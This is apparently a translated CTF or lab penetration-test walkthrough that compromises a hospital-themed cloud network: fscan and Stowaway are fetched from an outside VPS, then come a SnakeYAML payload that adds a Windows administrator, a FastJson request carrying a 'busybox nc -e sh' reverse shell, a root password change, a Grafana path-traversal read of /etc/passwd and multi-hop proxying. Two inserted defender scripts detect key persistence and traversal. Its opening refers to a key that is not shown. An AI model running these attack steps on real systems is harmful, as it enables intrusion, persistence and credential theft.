Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-164-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Welcome to Alibaba Cloud Elastic Compute Service !

Last login: Mon Dec 18 18:07:10 2023 from 36.112.10.102
root@web01:~#
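The key written above is the persistence step a defender most wants to catch: a new entry in a privileged account's authorized_keys. The following added example (my own code, not from the writeup) parses authorized_keys lines, including ones with a leading options field, computes the OpenSSH-style SHA256 fingerprint of each key, and reports entries missing from a baseline allowlist. The baseline key is a constructed, syntactically valid ssh-ed25519 blob with an all-zero body; the second key in the sample file is the public key the writeup appends.

```python
import base64
import hashlib

KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 public-key blob
    (the value `ssh-keygen -lf` prints): base64 of sha256(blob), no padding."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Parse authorized_keys lines: [options] type blob [comment].
    Limitation: option values containing spaces (command="a b") are not handled."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # the key type is the first field that looks like one; everything before it is options
        idx = next((i for i, f in enumerate(fields) if f.startswith(KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(fields):
            continue
        entries.append({
            "options": " ".join(fields[:idx]),
            "type": fields[idx],
            "fingerprint": fingerprint(fields[idx + 1]),
            "comment": " ".join(fields[idx + 2:]),
        })
    return entries


def unexpected_keys(text, allowed_fingerprints):
    """Entries in the file whose fingerprint is not in the baseline allowlist."""
    return [e for e in parse_authorized_keys(text) if e["fingerprint"] not in allowed_fingerprints]


# Constructed baseline key: valid ssh-ed25519 wire format (type string + 32-byte
# key) with an all-zero key body, so it decodes but belongs to nobody.
BASELINE_BLOB = "AAAAC3NzaC1lZDI1NTE5AAAAI" + "A" * 43
BASELINE_FINGERPRINTS = {fingerprint(BASELINE_BLOB)}

# Constructed file contents: the baseline deploy key, then the key the writeup appends.
CURRENT_AUTHORIZED_KEYS = f"""\
# ops deploy key
from="10.0.0.0/8",no-pty ssh-ed25519 {BASELINE_BLOB} deploy@bastion
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFaiQLgsnx4YvCaeyvrfA6z9J7jnQB43fm9B0Ep27DKB root@kaada
"""

if __name__ == "__main__":
    for e in unexpected_keys(CURRENT_AUTHORIZED_KEYS, BASELINE_FINGERPRINTS):
        print("UNEXPECTED", e["type"], e["fingerprint"], e["comment"] or "(no comment)",
              "options:", e["options"] or "(none)")
```

Comparing on fingerprints rather than on the raw line means a re-ordered or re-commented baseline key does not raise a false alarm, while a new key with a borrowed comment still does. Run against `/root/.ssh/authorized_keys` and each user's `~/.ssh/authorized_keys` from a file-integrity job; an entry with no restricting options on a root account, like the one flagged here, deserves the highest priority.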

Upload fscan to probe the internal network.

root@web01:~# busybox wget 38.55.99.145/FScan_2.0.1_linux_x32
Connecting to 38.55.99.145 (38.55.99.145:80)
FScan_2.0.1_linux_x3 100% |***********************************************************************************************************| 7947k 0:00:00 ETA
root@web01:~#

root@web01:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.30.12.5 netmask 255.255.0.0 broadcast 172.30.255.255
inet6 fe80::216:3eff:fe31:8b2f prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:31:8b:2f txqueuelen 1000 (Ethernet)
RX packets 60611 bytes 84652129 (84.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 12744 bytes 10594215 (10.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 956 bytes 86702 (86.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 956 bytes 86702 (86.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

root@web01:~# ./FScan_2.0.1_linux_x32 -h 172.30.12.0/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1

[2.8s] 已选择服务扫描模式
[2.8s] 开始信息扫描
[2.8s] CIDR范围: 172.30.12.0-172.30.12.255
[2.8s] generate_ip_range_full
[2.8s] 解析CIDR 172.30.12.0/24 -> IP范围 172.30.12.0-172.30.12.255
[2.8s] 最终有效主机数量: 256
[2.8s] 开始主机扫描
[2.8s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[2.8s] [*] 目标 172.30.12.236 存活 (ICMP)
[2.8s] [*] 目标 172.30.12.5 存活 (ICMP)
[2.8s] [*] 目标 172.30.12.6 存活 (ICMP)
[5.8s] 存活主机数量: 3
[5.8s] 有效端口数量: 233
[5.8s] [*] 端口开放 172.30.12.236:22
[5.8s] [*] 端口开放 172.30.12.236:8009
[5.9s] [*] 端口开放 172.30.12.6:8848
[5.9s] [*] 端口开放 172.30.12.236:8080
[5.9s] [*] 端口开放 172.30.12.6:445
[5.9s] [*] 端口开放 172.30.12.6:139
[5.9s] [*] 端口开放 172.30.12.6:135
[5.9s] [*] 端口开放 172.30.12.5:22
[5.9s] [*] 端口开放 172.30.12.5:8080
[6.9s] 扫描完成, 发现 9 个开放端口
[6.9s] 存活端口数量: 9
[6.9s] 开始漏洞扫描
[7.1s] [*] NetInfo 扫描结果
目标主机: 172.30.12.6
主机名: Server02
发现的网络接口:
IPv4地址:
└─ 172.30.12.6
[7.2s] [+] NetBios 172.30.12.6 WORKGROUP\SERVER02
[7.2s] POC加载完成: 总共387个,成功387个,失败0个
[7.3s] [*] 网站标题 http://172.30.12.5:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=C91712B05C355213131B3863C259B583
[7.5s] [*] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964 标题:医院后台管理平台
[7.5s] [*] 网站标题 http://172.30.12.5:8080/login;jsessionid=C91712B05C355213131B3863C259B583 状态码:200 长度:2005 标题:医疗管理后台
[7.7s] [*] 网站标题 http://172.30.12.6:8848 状态码:404 长度:431 标题:HTTP Status 404 – Not Found
[48.6s] 扫描已完成: 16/16

root@web01:~# busybox wget 38.55.99.145/fscan
Connecting to 38.55.99.145 (38.55.99.145:80)
fscan 100% |***********************************************************************************************************| 8384k 0:00:00 ETA
root@web01:~# chmod +x fscan
root@web01:~# ./fscan -h 172.30.12.0/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2026-02-07 15:54:37] [INFO] 暴力破解线程数: 1
[2026-02-07 15:54:37] [INFO] 开始信息扫描
[2026-02-07 15:54:38] [INFO] CIDR范围: 172.30.12.0-172.30.12.255
[2026-02-07 15:54:38] [INFO] 生成IP范围: 172.30.12.0.%!d(string=172.30.12.255) - %!s(MISSING).%!d(MISSING)
[2026-02-07 15:54:38] [INFO] 解析CIDR 172.30.12.0/24 -> IP范围 172.30.12.0-172.30.12.255
[2026-02-07 15:54:38] [INFO] 最终有效主机数量: 256
[2026-02-07 15:54:38] [INFO] 开始主机扫描
[2026-02-07 15:54:38] [SUCCESS] 目标 172.30.12.5 存活 (ICMP)
[2026-02-07 15:54:38] [SUCCESS] 目标 172.30.12.6 存活 (ICMP)
[2026-02-07 15:54:38] [SUCCESS] 目标 172.30.12.236 存活 (ICMP)
[2026-02-07 15:54:41] [INFO] 存活主机数量: 3
[2026-02-07 15:54:41] [INFO] 有效端口数量: 233
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.236:22
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.5:22
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.6:445
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.6:139
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.6:135
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.236:8009
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.236:8080
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.5:8080
[2026-02-07 15:54:41] [SUCCESS] 端口开放 172.30.12.6:8848
[2026-02-07 15:54:41] [SUCCESS] 服务识别 172.30.12.236:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2026-02-07 15:54:41] [SUCCESS] 服务识别 172.30.12.5:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2026-02-07 15:54:46] [SUCCESS] 服务识别 172.30.12.6:445 =>
[2026-02-07 15:54:46] [SUCCESS] 服务识别 172.30.12.6:139 => Banner:[.]
[2026-02-07 15:54:46] [SUCCESS] 服务识别 172.30.12.236:8009 =>
[2026-02-07 15:54:46] [SUCCESS] 服务识别 172.30.12.5:8080 => [http]
[2026-02-07 15:54:47] [SUCCESS] 服务识别 172.30.12.236:8080 => [http]
[2026-02-07 15:54:51] [SUCCESS] 服务识别 172.30.12.6:8848 => [http]
[2026-02-07 15:55:46] [SUCCESS] 服务识别 172.30.12.6:135 =>
[2026-02-07 15:55:46] [INFO] 存活端口数量: 9
[2026-02-07 15:55:46] [INFO] 开始漏洞扫描
[2026-02-07 15:55:46] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2026-02-07 15:55:46] [SUCCESS] NetInfo 扫描结果
目标主机: 172.30.12.6
主机名: Server02
发现的网络接口:
IPv4地址:
└─ 172.30.12.6
[2026-02-07 15:55:46] [SUCCESS] NetBios 172.30.12.6 WORKGROUP\SERVER02
[2026-02-07 15:55:46] [SUCCESS] 网站标题 http://172.30.12.5:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=05FF1B1C8811FD9F1311EEAA008C271E
[2026-02-07 15:55:46] [SUCCESS] 网站标题 http://172.30.12.6:8848 状态码:404 长度:431 标题:HTTP Status 404 – Not Found
[2026-02-07 15:55:46] [SUCCESS] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964 标题:医院后台管理平台
[2026-02-07 15:55:47] [SUCCESS] 目标: http://172.30.12.6:8848
漏洞类型: poc-yaml-alibaba-nacos
漏洞名称:
详细信息:
author:AgeloVito
links:https://blog.csdn.net/caiqiiqi/article/details/112005424
[2026-02-07 15:55:47] [SUCCESS] 网站标题 http://172.30.12.5:8080/login;jsessionid=05FF1B1C8811FD9F1311EEAA008C271E 状态码:200 长度:2005 标题:医疗管理后台
[2026-02-07 15:55:47] [SUCCESS] 目标: http://172.30.12.6:8848
漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
漏洞名称:
详细信息:
author:kmahyyg(https://github.com/kmahyyg)
links:https://github.com/alibaba/nacos/issues/4593
[2026-02-07 15:55:49] [SUCCESS] 目标: http://172.30.12.5:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html

Two more hosts show up, one of them running Nacos. Upload Stowaway to set up a proxy.

root@web01:~# busybox wget 38.55.99.145/linux_x64_agent
Connecting to 38.55.99.145 (38.55.99.145:80)
linux_x64_agent 100% |***********************************************************************************************************| 2174k 0:00:00 ETA
root@web01:~# chmod +x linux_x64_agent
root@web01:~#
[*] Starting admin node on port 9999

.-') .-') _ ('\ .-') /' ('-. ('\ .-') /' ('-.
( OO ). ( OO) ) '.( OO ),' ( OO ).-. '.( OO ),' ( OO ).-.
(_)---\_)/ '._ .-'),-----. ,--./ .--. / . --. /,--./ .--. / . --. / ,--. ,--.
/ _ | |'--...__)( OO' .-. '| | | | \-. \ | | | | \-. \ \ '.' /
\ :' '. '--. .--'/ | | | || | | |,.-'-' | || | | |,.-'-' | | .-') /
'..'''.) | | \_) | |\| || |.'.| |_)\| |_.' || |.'.| |_)\| |_.' |(OO \ /
.-._) \ | | \ | | | || | | .-. || | | .-. | | / /\_
\ / | | '' '-' '| ,'. | | | | || ,'. | | | | | '-./ /.__)
'-----' '--' '-----' '--' '--' '--' '--''--' '--' '--' '--' '--'
{ v2.2 Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 39.98.119.127:34102 is set up successfully! Node id is 0
(admin) >>
(node 0) >> socks 7777
[*] Trying to listen on 0.0.0.0:7777......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >>

Configure proxychains4 on Kali to use port 7777 on the VPS and browse through it with Firefox.

Weak credentials: nacos:nacos

db-config:

server:
port: 8080
servlet:
context-path: /hello

spring:
application:
name: db-config
cloud:
nacos:
discovery:
server-addr: 127.0.0.1:8848
config:
server-addr: 127.0.0.1:8848
file-extension: yaml
namespace: dev
group: DEFAULT_GROUP
data-id: db-config.yaml
datasource:
mysql:
url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
username: root
password: P@ssWord!!!
redis:
host: localhost
port: 6379

management:
endpoints:
web:
exposure:
include: '*'

Next, check for vulnerabilities with a tool.

Exploit the YAML deserialization vulnerability.

artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads

┌──(root㉿kaada)-[/home//Desktop/yaml-payload-master/src/artsploit]
└─# cat AwesomeScriptEngineFactory.java
package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            // Changed here to a Windows payload
            // 1. Add the user kaada with password qwer1234!
            Runtime.getRuntime().exec("net user kaada qwer1234! /add");
            // 2. Add the user to the local administrators group
            Runtime.getRuntime().exec("net localgroup administrators kaada /add");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }



Then compile the source into a malicious jar and upload it to web01.

┌──(root㉿kaada)-[/home/…/Desktop/yaml-payload-master/src/artsploit]
└─# javac AwesomeScriptEngineFactory.java
Note: AwesomeScriptEngineFactory.java uses or overrides a deprecated API.
Note: Recompile with -Xlint:deprecation for details.

┌──(root㉿kaada)-[/home/…/Desktop/yaml-payload-master/src/artsploit]
└─# cd ..

┌──(root㉿kaada)-[/home/kali/Desktop/yaml-payload-master/src]
└─# mkdir -p META-INF/services/

┌──(root㉿kaada)-[/home/kali/Desktop/yaml-payload-master/src]
└─# echo "artsploit.AwesomeScriptEngineFactory" > META-INF/services/javax.script.ScriptEngineFactory

┌──(root㉿kaada)-[/home/kali/Desktop/yaml-payload-master/src]
└─# jar -cvf malicious.jar artsploit/AwesomeScriptEngineFactory.class META-INF/
added manifest
adding: artsploit/AwesomeScriptEngineFactory.class(in = 1675) (out= 720)(deflated 57%)
ignoring entry META-INF/
adding: META-INF/services/(in = 0) (out= 0)(stored 0%)
adding: META-INF/services/javax.script.ScriptEngineFactory(in = 37) (out= 39)(deflated -5%)

┌──(root㉿kaada)-[/home/kali/Desktop/yaml-payload-master/src]
└─# ls
artsploit malicious.jar META-INF

scp malicious.jar root@39.98.119.127:~
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
malicious.jar 100% 1551 14.6KB/s 00:00

root@web01:~# ls
flag fscan FScan_2.0.1_linux_x32 linux_x64_agent malicious.jar result.txt
root@web01:~#
root@web01:~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...


Damn it, adding the user kept failing here, so I switched to another tool and injected a memory shell instead.

Got flag2.

Next, look at http://172.30.12.236:8080, the hospital back-end.

Guessing it is FastJson.

Found the version number.

amaz1ngday/fastjson-exp: fastjson exploitation, supports Tomcat and Spring echo and Godzilla memory shells; the echo gadget chains are dhcp, ibatis and c3p0.

Inject a memory shell.

Before that, grab the flag first.

The memory shell injection failed, so go the other way and use busybox for a reverse shell directly.

POST /login HTTP/1.1
Host: 172.30.12.236:8080
User-Agent: Mozilla/5.0 (Linux; Android 11; Pixel C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/json
Accept-Cache: busybox nc 172.30.12.5 8888 -e sh
cmd: echo test
Origin: http://172.30.12.236:8080
Referer: http://172.30.12.236:8080/login
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 6958

First change the root password.

root@web03:/# passwd
passwd
New password: 123456

Retype new password: 123456

passwd: password updated successfully

Found another network segment.

root@web03:/# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.30.12.236 netmask 255.255.0.0 broadcast 172.30.255.255
inet6 fe80::216:3eff:fe31:8bb1 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:31:8b:b1 txqueuelen 1000 (Ethernet)
RX packets 127814 bytes 150055177 (150.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 43751 bytes 16612402 (16.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.30.54.179 netmask 255.255.255.0 broadcast 172.30.54.255
inet6 fe80::216:3eff:fe31:8b65 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:31:8b:65 txqueuelen 1000 (Ethernet)
RX packets 2550 bytes 107100 (107.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2570 bytes 108636 (108.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 5810 bytes 531058 (531.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5810 bytes 531058 (531.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


Download all the needed tools.

root@web03:/# ls
ls
bin etc lib libx32 media proc sbin tmp
boot fscan lib32 linux_x64_agent mnt root srv usr
dev home lib64 lost+found opt run sys var
root@web03:/#

SSH into web03.

Probe the internal network with fscan.

root@web03:/# ./fscan -h 172.30.54.0/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2026-02-07 19:17:21] [INFO] 暴力破解线程数: 1
[2026-02-07 19:17:21] [INFO] 开始信息扫描
[2026-02-07 19:17:21] [INFO] CIDR范围: 172.30.54.0-172.30.54.255
[2026-02-07 19:17:21] [INFO] 生成IP范围: 172.30.54.0.%!d(string=172.30.54.255) - %!s(MISSING).%!d(MISSING)
[2026-02-07 19:17:22] [INFO] 解析CIDR 172.30.54.0/24 -> IP范围 172.30.54.0-172.30.54.255
[2026-02-07 19:17:22] [INFO] 最终有效主机数量: 256
[2026-02-07 19:17:22] [INFO] 开始主机扫描
[2026-02-07 19:17:22] [SUCCESS] 目标 172.30.54.179 存活 (ICMP)
[2026-02-07 19:17:22] [SUCCESS] 目标 172.30.54.12 存活 (ICMP)
[2026-02-07 19:17:25] [INFO] 存活主机数量: 2
[2026-02-07 19:17:25] [INFO] 有效端口数量: 233
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.12:5432
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.12:3000
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.12:22
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.179:22
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.179:8080
[2026-02-07 19:17:25] [SUCCESS] 端口开放 172.30.54.179:8009
[2026-02-07 19:17:25] [SUCCESS] 服务识别 172.30.54.12:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2026-02-07 19:17:25] [SUCCESS] 服务识别 172.30.54.179:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2026-02-07 19:17:30] [SUCCESS] 服务识别 172.30.54.12:5432 =>
[2026-02-07 19:17:30] [SUCCESS] 服务识别 172.30.54.12:3000 => [http] Banner:[HTTP/1.1 400 Bad Request.Content-Type: text/plain; charset=utf-8.Connection: close.400 Bad Request]
[2026-02-07 19:17:30] [SUCCESS] 服务识别 172.30.54.179:8009 =>
[2026-02-07 19:17:30] [SUCCESS] 服务识别 172.30.54.179:8080 => [http]
[2026-02-07 19:17:30] [INFO] 存活端口数量: 6
[2026-02-07 19:17:30] [INFO] 开始漏洞扫描
[2026-02-07 19:17:30] [INFO] 加载的插件: postgres, ssh, webpoc, webtitle
[2026-02-07 19:17:31] [SUCCESS] 网站标题 http://172.30.54.179:8080 状态码:200 长度:3964 标题:医院后台管理平台
[2026-02-07 19:17:31] [SUCCESS] 网站标题 http://172.30.54.12:3000 状态码:302 长度:29 标题:无标题 重定向地址: http://172.30.54.12:3000/login
[2026-02-07 19:17:31] [SUCCESS] 网站标题 http://172.30.54.12:3000/login 状态码:200 长度:27909 标题:Grafana
[2026-02-07 19:17:31] [SUCCESS] SSH认证成功 172.30.54.179:22 User:root Pass:123456

Grafana has an arbitrary file read vulnerability; probe /etc/passwd directly with curl.

root@web03:/# curl --path-as-is "http://172.30.54.12:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
ntp:x:108:115::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
_chrony:x:110:121:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
grafana:x:111:122::/usr/share/grafana:/bin/false
postgres:x:112:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
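A defender-side check for the traversal pattern just shown, added here as an example (not the writeup's own code): it decodes and normalises each logged request path and flags any /public/plugins/<id>/ request that resolves outside that plugin's directory. The nginx-style access log lines are constructed.

```python
"""Flag Grafana plugin-asset requests that escape their plugin directory (the
CVE-2021-43798 pattern above).  Added example, not the writeup's code; the
nginx-style access log lines are constructed."""
import posixpath
import re
from urllib.parse import unquote

PLUGIN_PREFIX = "/public/plugins/"

# Constructed access log lines for a reverse proxy in front of Grafana.
SAMPLE_LOG = """\
172.30.54.179 - - [07/Feb/2026:19:20:01 +0800] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1856
172.30.54.179 - - [07/Feb/2026:19:20:05 +0800] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 4012
10.0.0.7 - - [07/Feb/2026:19:21:10 +0800] "GET /public/plugins/welcome/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1856
10.0.0.7 - - [07/Feb/2026:19:21:12 +0800] "GET /login HTTP/1.1" 200 27909
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def resolve(raw_path: str) -> str:
    """Percent-decode, drop the query string and collapse '.' / '..' segments."""
    return posixpath.normpath(unquote(raw_path.split("?", 1)[0]))


def is_plugin_traversal(raw_path: str) -> bool:
    """True when /public/plugins/<id>/... resolves outside /public/plugins/<id>/.
    Browsers collapse '..' themselves (hence curl --path-as-is above), so the raw
    logged path is decoded and normalised here before the prefix check."""
    path = unquote(raw_path.split("?", 1)[0])
    if not path.startswith(PLUGIN_PREFIX):
        return False
    plugin_id, sep, _rest = path[len(PLUGIN_PREFIX):].partition("/")
    if not plugin_id or not sep:
        return False
    return not resolve(raw_path).startswith(PLUGIN_PREFIX + plugin_id + "/")


def scan_access_log(text: str) -> list:
    """One finding per traversal request; status 200 means the file was served."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if m and is_plugin_traversal(m["path"]):
            findings.append({"client": line.split(" ", 1)[0], "path": m["path"],
                             "resolved": resolve(m["path"]),
                             "served": m["status"] == "200"})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```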

There is a PostgreSQL database.

Releases · A-D-Team/grafanaExp

Got the postgres credentials.

postgres:Postgres@123

Now set up a multi-level proxy.

root@web03:/# chmod +x linux_x64_agent
root@web03:/# ls
bin dev fscan lib lib64 linux_x64_agent media opt result.txt run srv tmp var
boot etc home lib32 libx32 lost+found mnt proc root sbin sys usr
root@web03:/# ./linux_x64_agent -c 172.30.12.5:10000 -s 123
2026/02/07 19:36:26 [*] Starting agent node actively.Connecting to 172.30.12.5:10000
(node 0) >> listen
[*] BE AWARE! If you choose IPTables Reuse or SOReuse,you MUST CONFIRM that the node you're controlling was started in the corresponding way!
[*] When you choose IPTables Reuse or SOReuse, the node will use the initial config(when node started) to reuse port!
[*] Please choose the mode(1.Normal passive/2.IPTables Reuse/3.SOReuse): 1
[*] Please input the [ip:]<port> : 10000
[*] Waiting for response......
[*] Node is listening on 10000
(node 0) >> use 0
[*] Unknown Command!

help Show help information
status Show node status,including socks/forward/backward
listen Start port listening on current node
addmemo <string> Add memo for current node
delmemo Delete memo of current node
ssh <ip:port> Start SSH through current node
shell Start an interactive shell on current node
socks <lport> [username] [pass] Start a socks5 server
stopsocks Shut down socks services
connect <ip:port> Connect to a new node
sshtunnel <ip:sshport> <agent port> Use sshtunnel to add the node into our topology
upload <local filename> <remote filename> Upload file to current node
download <remote filename> <local filename> Download file from current node
forward <lport> <ip:port> Forward local port to specific remote ip:port
stopforward Shut down forward services
backward <rport> <lport> Backward remote port(agent) to local port(admin)
stopbackward Shut down backward services
shutdown Terminate current node
back Back to parent panel
exit Exit Stowaway

(node 0) >>
[*] New node online! Node id is 1

Set up successfully.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 curl --path-as-is "http://172.30.54.12:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
